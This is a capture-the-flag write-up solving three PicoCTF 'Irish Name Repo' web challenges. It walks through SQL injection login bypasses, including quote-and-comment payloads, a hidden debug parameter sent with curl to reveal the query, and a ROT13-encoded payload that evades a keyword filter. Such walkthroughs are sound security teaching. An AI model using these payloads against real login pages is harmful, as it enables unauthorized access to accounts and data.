CTF – Irish-Name-Repo 1-3
We’re going to look at the 3 ‘Irish Name Repo’ hacking challenges supplied by PicoCTF. All three challenges are broken down below, so you can see how the solution develops.
Irish Name Repo 1
This is a 300 point Web Exploitation hacking challenge.
This is what we’re provided with:
AUTHOR: CHRIS HENSLER
Description
There is a website running at
https://jupiter.challenges.picoctf.org/problem/33850/
(link) or http://jupiter.challenges.picoctf.org:33850.Do you think you can log us in? Try to see if you can login!
PicoCTF challenge info
If you navigate to the site and then over to the ‘Support’ section you realise two things, firstly the site administrator has the username ‘Admin’, and secondly a user is complaining they’re having difficulty adding a name. That name happens to include a single quote… a telltale sign SQL injection may be possible.
Hi. I tried adding my favorite Irish person, Conan O’Brien. But I keep getting something called a SQL Error
Possible attack vector – SQL injection with single quotes not being handled properly…
If we head over to the login page, we can try a few simple ideas with the username ‘Admin’ as an educated guess.
Using a single quote in the password sure does look bad… the site breaks.
So the challenge site may be susceptible to single un-escaped quotes. If we try the following payload, we get our flag…
Username: admin
Password: ' or 1 --
Irish Name Repo 2
This is a 350 point Web Exploitation hacking challenge.
This is what we’re provided with:
AUTHOR: XINGYANG PAN
Description
There is a website running at https://jupiter.challenges.picoctf.org/problem/64649/ (link).
Someone has bypassed the login before, and now it’s being strengthened. Try to see if you can still login! or http://jupiter.challenges.picoctf.org:64649
PicoCTF challenge info
Okay, so whats the difference between this and the first Irish Name Repor challenge?
Well if we use the payload from the first challenge, we’re presented with:
Tweaking the payload for the password, we can see that ‘ OR 1=1 ‘ is causing us to be detected. Trimming it even further we can see the OR operator causes the detection.
The single hint on this hacking challenge is that the parameters are being filtered. We already knew that.
Taking a look at the HTML source code, we can see a hidden field called debug, with a value of 0. Bingo.
It may be easier to jump over to CURL now;
curl 'https://jupiter.challenges.picoctf.org/problem/64649/login.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: https://jupiter.challenges.picoctf.org' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: https://jupiter.challenges.picoctf.org/problem/64649/login.html' -H 'Cookie: PHPSESSID=d9jfl0mhsvfk6ib40etlue6ofl' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'username=admin&password=%27+or+1%3D1+--&debug=1'
Firing off that request, with the debug value now set to 1, we get the following reponse:
<pre>username: Admin
password: ' or 1=1 --
SQL query: SELECT * FROM users WHERE name='admin' AND password='' or 1=1 --'
</pre><h1>SQLi detected.</h1>
Excellent info.
We can see that within the SQL query, the 1st condition is against the name attribute. Knowing this, we can exploit that attribute and leave the rest of the query as an ignorable comment.
With that info we can use the following payload to reveal the flag:
Username: admin'--
Password: (blank)
Irish Name Repo 3
This is the last 400 point Web Exploitation hacking challenge of this mini series.
This is what we’re provided with:
AUTHOR: XINGYANG PAN
Description
There is a secure website running at
PicoCTF challenge briefhttps://jupiter.challenges.picoctf.org/problem/54253/
(link) or http://jupiter.challenges.picoctf.org:54253. Try to see if you can login as admin!
There’s two changes with this hacking challenge.
Irish Name Repo 3 see’s the username field dropped, as well as 301 redirects to the HTTPS version. Neither pose any issue.
We jump over to the login screen, perform a simple test login and capture it in the browser navigation panel. We can then export it in CURL format for tweaking.
curl 'https://jupiter.challenges.picoctf.org/problem/54253/login.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: https://jupiter.challenges.picoctf.org' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: https://jupiter.challenges.picoctf.org/problem/54253/login.html' -H 'Cookie: PHPSESSID=d9jfl0mhsvfk6ib40etlue6ofl' -H 'Upgrade-Insecure-Requests: 1' --data-raw 'password=test&debug=1'
Using a password of test obviously fails, but with the debug field set to 1 we see the following output.
<pre>password: test
SQL query: SELECT * FROM admin where password = 'grfg'
</pre><h1>Login failed.</h1>
“grfg” – that’s not what we entered as a password! Dumping in a password value of ‘abcdefgh‘ we get the ‘encoded’ value of ‘nopqrstu‘. So the application is taking the parameter, encrypting it somehow, and then comparing that to the stored encrypted password in the DB.
Thankfully I recognise ROT13 encryption when I see it.
Using a RO13 encoder, convert the simple payload from Irish Name Repo 1 challenge, from:
' OR 1=1 --
… to…
' BE 1=1 --
And that’s enough to bypass the filter and encryption.
The final hacking challenge flag should be yours.